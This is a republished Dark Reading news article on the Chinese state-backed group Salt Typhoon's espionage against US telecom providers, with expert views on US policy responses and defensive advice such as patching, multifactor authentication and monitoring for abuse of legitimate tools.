1(520) 261-1728

info@threatintel-solutions.net

Threat Intel Solutions

Let’s Talk

![Picture of Alexander Culafi, Senior News Writer, Dark Reading](https://eu-images.contentstack.com/v3/assets/blt6d90778a997de1cd/blte0c88f087d1ad6f5/67c609df64f983454c3dd40b/1571751486317.jpg?width=100&auto=webp&quality=80&disable=upscale ‘Picture of Alexander Culafi, Senior News Writer, Dark Reading’) [Alexander Culafi, Senior News Writer, Dark Reading](/author/alexander-culafi)April 10, 2025 8 Min Read ![Flags of the US and China painted on a cracked wall](https://eu-images.contentstack.com/v3/assets/blt6d90778a997de1cd/blt8809f8a29853108b/67f68868c69c2922ecde6163/China_US_flags_cracked_wall_Daniren_Alamy.jpg?width=1280&auto=webp&quality=95&format=jpg&disable=upscale ‘Flags of the US and China painted on a cracked wall’) Source: Daniren via Alamy Stock Photo [](https://www.linkedin.com/sharing/share-offsite/?url=https://www.darkreading.com/cyberattacks-data-breaches/what-should-us-do-salt-typhoon)[](http://www.facebook.com/sharer/sharer.php?u=https://www.darkreading.com/cyberattacks-data-breaches/what-should-us-do-salt-typhoon)[](http://www.twitter.com/intent/tweet?url=https://www.darkreading.com/cyberattacks-data-breaches/what-should-us-do-salt-typhoon)[](https://www.reddit.com/submit?url=https://www.darkreading.com/cyberattacks-data-breaches/what-should-us-do-salt-typhoon&title=What%20Should%20the%20US%20Do%20About%20Salt%20Typhoon%3F)[](mailto:?subject=What Should the US Do About Salt Typhoon?&body=I%20thought%20the%20following%20from%20Dark%20Reading%20might%20interest%20you.%0D%0A%0D%0A%20What%20Should%20the%20US%20Do%20About%20Salt%20Typhoon%3F%0D%0Ahttps%3A%2F%2Fwww.darkreading.com%2Fcyberattacks-data-breaches%2Fwhat-should-us-do-salt-typhoon) Of the countless threat actors, state-sponsored and otherwise, that target the US private and public sectors, few have gained the wide cultural relevance of Salt Typhoon, the Chinese state-sponsored threat actor that has targeted major telecommunications providers in a far-reaching, ongoing espionage campaign.Discovered last fall, Salt Typhoon has hacked into telecom giants in the US and abroad — including Verizon, AT-&T, Lumen Technologies, and others — in a successful effort to access [the ‘lawful intercept’ systems law enforcement agencies](https://www.darkreading.com/cyber-risk/salt-typhoon-apt-subverts-law-enforcement-wiretapping) use for court-authorized wiretapping. In its apparently months-long campaign, Salt Typhoon accessed sensitive data belonging to the Republican and Democratic 2024 presidential campaigns as well as that of other politicians. Salt Typhoon’s activities have continued [into the new year](https://www.darkreading.com/cyberattacks-data-breaches/salt-typhoon-exploits-cisco-devices-telco-infrastructure) and around the world. Although Chinese state-backed espionage against the US is well-established, the telecom-focused attacks reported last fall are a high-profile reminder of how these activities are escalating. The question is, What can the US do about it? Salt Typhoon: Truly an Advanced Threat————————————–CrowdStrike’s recent 2025 ‘Global Threat Report’ said China state-backed hacking has [reached an ‘inflection point’](https://www.techtarget.com/searchsecurity/news/366619774/CrowdStrike-China-hacking-has-reached-inflection-point) and noted a [150% increase in China-nexus activity](https://go.crowdstrike.com/2025-global-threat-report.html) across all sectors. Beyond espionage, the Chinese government has also shown an interest in [pre-positioning itself in critical environments](https://www.darkreading.com/vulnerabilities-threats/china-s-volt-typhoon-apt-burrows-us-critical-infrastructure) to prepare for possible escalation with adversaries.Related:[Threat Actors Use ‘Spam Bombing’ Technique to Hide Malicious Motives](/cyberattacks-data-breaches/threat-actors-spam-bombing-malicious-motives)Aaron Shraberg, senior intelligence analyst at Flashpoint, tells Dark Reading that on top of aforementioned espionage and pre-positioning activities, the group utilizes a number of sophisticated tactics. ‘Salt Typhoon has demonstrated stealth and persistence, meaning it is difficult to identify the threat on networks,’ Shraberg says. ‘The group has demonstrated proficiency in various tactics, techniques, and procedures (TTPs), like living off the land (LoTL), to use legitimate tools and blend in with network traffic to avoid discovery.’On April 2, the House Committee on Government Reform [dedicated a hearing](https://www.darkreading.com/cyberattacks-data-breaches/salt-typhoons-wake-congress-potential-options) to Salt Typhoon. During the hearing, state representative and committee chairman William Timmons (R-SC) asked Edward Amoroso, research professor at New York University, whether the US should retaliate for the Salt Typhoon attacks and what kind of response would be justified. Amoroso did not advocate for ‘hacking back’ (the popular colloquial term for retaliatory offensive cyber activity), instead saying the US should see it as a wake-up call for the country to shore up its defenses and pull together. He said the idea of hacking back ‘shirks the responsibility’ to look inward.Related:[Oracle Appears to Admit Breach of 2 ‘Obsolete’ Servers](/cyberattacks-data-breaches/oracle-breach-2-obsolete-servers)Dark Reading asked four security experts about the US’s options for responding to Salt Typhoon, as well as how defenders should protect themselves against APT threats.The Threat of Salt Typhoon————————–Asked how much of a threat Salt Typhoon’s malicious activities pose to the United States, experts Dark Reading spoke with broadly attested to their significance.Bobby Kuzma, director of offensive cyber operations at penetration testing and incident response firm ProCircular, says the activity Salt Typhoon engaged in was ‘pretty bad,’ noting the reach granted by leveraging the lawful intercept capabilities built into domestic telecommunications providers.’For every phone company and ISP (not that there’s much of a difference anymore) they have access to, they can intercept everything travelling over the network, including encrypted communications,’ Kuzma says. ‘They might not be able to read the content of those communications, but they can certainly look at patterns in who is talking to whom and make educated guesses.’ Dave Merkel, co-founder and CEO of managed security services vendor Expel, says it was a huge deal but, notably, nothing new. ‘China actively goes after US private sector organizations for a number of reasons, relating to counterintelligence, IP theft, you name it,’ he says.Related:[Minnesota Tribe Struggles After Ransomware Attack](/cyberattacks-data-breaches/minnesota-tribe-operations-ransomware-attack)And to Merkel’s point, China’s cyber efforts are more or less institutionalized by this point. CrowdStrike, for example, [regularly discusses](https://www.crowdstrike.com/en-us/blog/liminal-panda-telecom-sector-threats/) how China’s Five-Year Plans should be interpreted from a cyber-focused lens.This activity doesn’t seem to be slowing down. Austin Berglas, global head of professional services at security vendor BlueVoyant as well as former head of cyber for the FBI in New York, says as much.’Chinese state-sponsored attacks against United States critical infrastructure will continue to occur,’ Berglas says. ‘China has been embedding themselves in networks and exploiting supply chains for the purpose of conducting massive data collection activities for years. This is nothing new to the intelligence community.’He continues, ‘The fact that China is already embedded in US infrastructure is a massive concern. Traditional goals such as intellectual property theft and large-scale intelligence collection pales in comparison to the potential for disruption or takeover of critical services.’US Government Options for Response———————————-Kuzma names ‘strongly worded diplospeak,’ expelling members of diplomatic delegations, criminal charges against individual foreign citizens, and sanctions against organizations (which has [happened already](https://www.techtarget.com/searchsecurity/news/366618216/Treasury-Department-sanctions-company-tied-to-Salt-Typhoon)). ‘All these are so-called proportionate responses,’ he says. ‘It gets scarier from there.’Alon Termin, red team expert at exposure management firm CYE, approached the question of possible responses from a more cyber-focused angle. Namely, shoring up defenses and imposing stronger regulations. ‘The US can respond with defensive cyber operations to detect, deter, and neutralize threats,’ Termin says. ‘Implementing stricter cybersecurity regulations for critical infrastructure sectors could also help prevent such intrusions.’The FCC [proposed regulations last fall](https://docs.fcc.gov/public/attachments/DOC-408015A1.pdf) requiring communication providers to annually certify, update, and implement cybersecurity risk management plans.How Should the US Respond to Salt Typhoon?——————————————Similarly to Amoroso’s answer during the April 2 House Committee on Government Reform hearing, sources broadly responded to the question of what the US government should do by calling for better security hygiene in its most critical institutions. Here’s what they said: * Austin Berglas, BlueVoyant: Our response should be to finally get our own house in order so that we can properly protect the homeland. Private corporations need to learn lessons from failures within the US government. Permitting sensitive and business-related conversations [to be conducted on platforms outside of corporate approved networks and devices](https://www.darkreading.com/cybersecurity-operations/opsec-nightmare-leaking-us-military-plans-reporter) will only cause problems, and policies and procedures are only useful if enforced and followed. The FCC recently proposed to strengthen rules for telecom providers to secure their environment. This guidance is nothing without action and adoption. Lastly, our adversaries do not need to deploy sophisticated, zero-day exploits to have success. They are capitalizing on patchable, previously identified vulnerabilities. Basic hygiene calls for continuous and complete visibility across your network and monitoring of your most critical supply chain relationships.* Alon Termin, CYE: The best way to respond is by investing in advanced cybersecurity technologies and practices to protect critical systems.* Anne An, principal threat intelligence analyst, Trellix: I’d hope that the US government will prioritize the development and deployment of more secure edge devices, such as phones, laptops, and other IoT -[Internet of Things-] hardware, which are becoming an increasing point of vulnerability. They are often the first line of defense in a network, and as they are more widely used, they become targets for APTs.* Bobby Kuzma, ProCircular: The US has already exerted pressure on China to make its displeasure known, through sanctions and individual criminal charges against MSS officers linked to the attacks. Another consideration that is on the table, but probably won’t be acted on, is allowing telecom organizations to shut down or remove the lawful intercept capability that acts as an effective backdoor into their infrastructure. There needs to be a balance between convenience to law enforcement for surveillance and having massive backdoors that allow for this exploitation. Defender Takeaways From Salt Typhoon————————————Although state-backed espionage may not be something every organization feels it has to worry about, the best practices for defending against an APT are generally good advice, no matter who you are.Expel’s Merkel advises enforcing good cyber hygiene, such as patching quickly, supporting multifactor authentication, and maintaining good asset inventories. He calls this the ‘bare minimum,’ and suggests taking a defense-in-depth approach to security and prioritizing strong detection and response.Flashpoint’s Shraberg, meanwhile, calls for enterprises to adopt a ‘proactive and layered security approach drawing on public and private sector resources and expertise.”There are many ways to address the multifaced nature of sophisticated threat actors. Technical defenses are very important and should be combined with a level of education of individuals to learn how to do their part to fend off attacks from things like phishing and social engineering, especially as AI tools now find their way into attackers’ toolboxes,’ Shraberg says. ‘Given the potential for supply chain compromises highlighted with other Chinese APT groups, enterprises should also assess and manage the security risks associated with their vendors and partners, such as those involving networking equipment like routers.’An says that as Salt Typhoon typically uses otherwise legitimate tools like PowerShell and WMI, organizations should monitor for unusual or suspicious activity associated with living off the land, as well as compromised accounts.’One of the group’s most common tactics is to use legitimate credentials and move laterally within the network, so organizations should follow strong monitoring practices to detect and respond to compromised accounts as quickly as possible,’ An says. ‘They can do this by implementing and enforcing multifactor authentication, conducting frequent audits, and regularly analyzing login behavior for any signs of irregular activity.’Organizations should also patch public-facing services, VPNs, and legacy systems — common entry points for attackers.Though a common impulse for the US right now to handle China from a place of escalation and retaliation, Dark Reading sources uniformly do not propose doing something similar on the cyber front. Instead, as Amoroso put it at last week’s House committee hearing, ‘The best defense is a good defense.’ Read more about:[CISO Corner](/keyword/ciso-corner) [](https://www.linkedin.com/sharing/share-offsite/?url=https://www.darkreading.com/cyberattacks-data-breaches/what-should-us-do-salt-typhoon)[](http://www.facebook.com/sharer/sharer.php?u=https://www.darkreading.com/cyberattacks-data-breaches/what-should-us-do-salt-typhoon)[](http://www.twitter.com/intent/tweet?url=https://www.darkreading.com/cyberattacks-data-breaches/what-should-us-do-salt-typhoon)[](https://www.reddit.com/submit?url=https://www.darkreading.com/cyberattacks-data-breaches/what-should-us-do-salt-typhoon&title=What%20Should%20the%20US%20Do%20About%20Salt%20Typhoon%3F)[](mailto:?subject=What Should the US Do About Salt Typhoon?&body=I%20thought%20the%20following%20from%20Dark%20Reading%20might%20interest%20you.%0D%0A%0D%0A%20What%20Should%20the%20US%20Do%20About%20Salt%20Typhoon%3F%0D%0Ahttps%3A%2F%2Fwww.darkreading.com%2Fcyberattacks-data-breaches%2Fwhat-should-us-do-salt-typhoon) About the Author—————-![Alexander Culafi, Senior News Writer, Dark Reading](https://eu-images.contentstack.com/v3/assets/blt6d90778a997de1cd/blte0c88f087d1ad6f5/67c609df64f983454c3dd40b/1571751486317.jpg?width=400&auto=webp&quality=80&disable=upscale ‘Alexander Culafi, Senior News Writer, Dark Reading’) [Alexander Culafi, Senior News Writer, Dark Reading](/author/alexander-culafi) Dark Reading Alex is a writer, journalist, and podcaster based in Boston. [See more from Alexander Culafi, Senior News Writer, Dark Reading](/author/alexander-culafi) Keep up with the latest cybersecurity threats, newly discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox. [Subscribe](https://dr-resources.darkreading.com/free/w_defa3135/prgm.cgi) More Insights Webinars* [My Server is Secure. Why Should I Bother about my Mobile App?](https://dr-resources.darkreading.com/c/pubRD.mpl?secure=1&sr=pp&_t=pp:&qf=w_guas12&ch=SBX&cid=_upcoming_webinars_8.500001539&_mc=_upcoming_webinars_8.500001539)Apr 15, 2025* [VPNs, RMMs, and Beyond: How Are Attackers Adapting?](https://dr-resources.darkreading.com/c/pubRD.mpl?secure=1&sr=pp&_t=pp:&qf=w_goog82&ch=SBX&cid=_upcoming_webinars_8.500001544&_mc=_upcoming_webinars_8.500001544)Apr 16, 2025* [Identifying Third-Party Risk Using Threat Intelligence](https://dr-resources.darkreading.com/c/pubRD.mpl?secure=1&sr=pp&_t=pp:&qf=w_bits16&ch=SBX&cid=_upcoming_webinars_8.500001538&_mc=_upcoming_webinars_8.500001538)Apr 17, 2025* [Top 5 Most Dangerous Security Vulnerabilities](https://dr-resources.darkreading.com/c/pubRD.mpl?secure=1&sr=pp&_t=pp:&qf=w_okta39&ch=SBX&cid=_upcoming_webinars_8.500001537&_mc=_upcoming_webinars_8.500001537)Apr 22, 2025* [Find and Fix Application Vulnerabilities… At Cyber Speed](https://dr-resources.darkreading.com/c/pubRD.mpl?secure=1&sr=pp&_t=pp:&qf=w_defa7896&ch=SBX&cid=_upcoming_webinars_8.500001549&_mc=_upcoming_webinars_8.500001549)Apr 23, 2025[More Webinars](/resources?types=Webinar) Events* [-[Conference-] Black Hat USA – August 2-7 – Learn More](https://www.blackhat.com/us-25/?_mc=we_bhas25_drcuration&cid=_session_16.500330)Aug 2, 2025[More Events](/events)You May Also Like*** ** * ** ***[Cyberattacks -& Data BreachesActively Exploited ChatGPT Bug Puts Organizations at Risk](https://www.darkreading.com/cyberattacks-data-breaches/actively-exploited-chatgpt-bug-organizations-risk) [Cyberattacks -& Data Breaches300K Victims’ Data Compromised in Avis Car Rental Breach](https://www.darkreading.com/cyberattacks-data-breaches/300k-victims-data-compromised-avis-car-rental-breach) [Cyberattacks -& Data BreachesToyota Customer, Employee Data Leaked in Confirmed Data Breach](https://www.darkreading.com/cyberattacks-data-breaches/toyota-customer-employee-data-leaks-in-confirmed-data-breach) [Cyberattacks -& Data BreachesFBI Shuts Down Dozens of Radar/Dispossessor Ransomware Servers](https://www.darkreading.com/cyberattacks-data-breaches/fbi-shuts-down-dozens-of-radar-dispossessor-ransomware-servers)

Related Tags:
NAICS: 48 – Transportation

NAICS: 921 – Executive

Legislative

Other General Government Support

NAICS: 61 – Educational Services

NAICS: 611 – Educational Services

NAICS: 54 – Professional

Scientific

Technical Services

NAICS: 923 – Administration Of Human Resource Programs

NAICS: 541 – Professional

Scientific

Technical Services

NAICS: 92 – Public Administration

NAICS: 928 – National Security And International Affairs

Associated Indicators: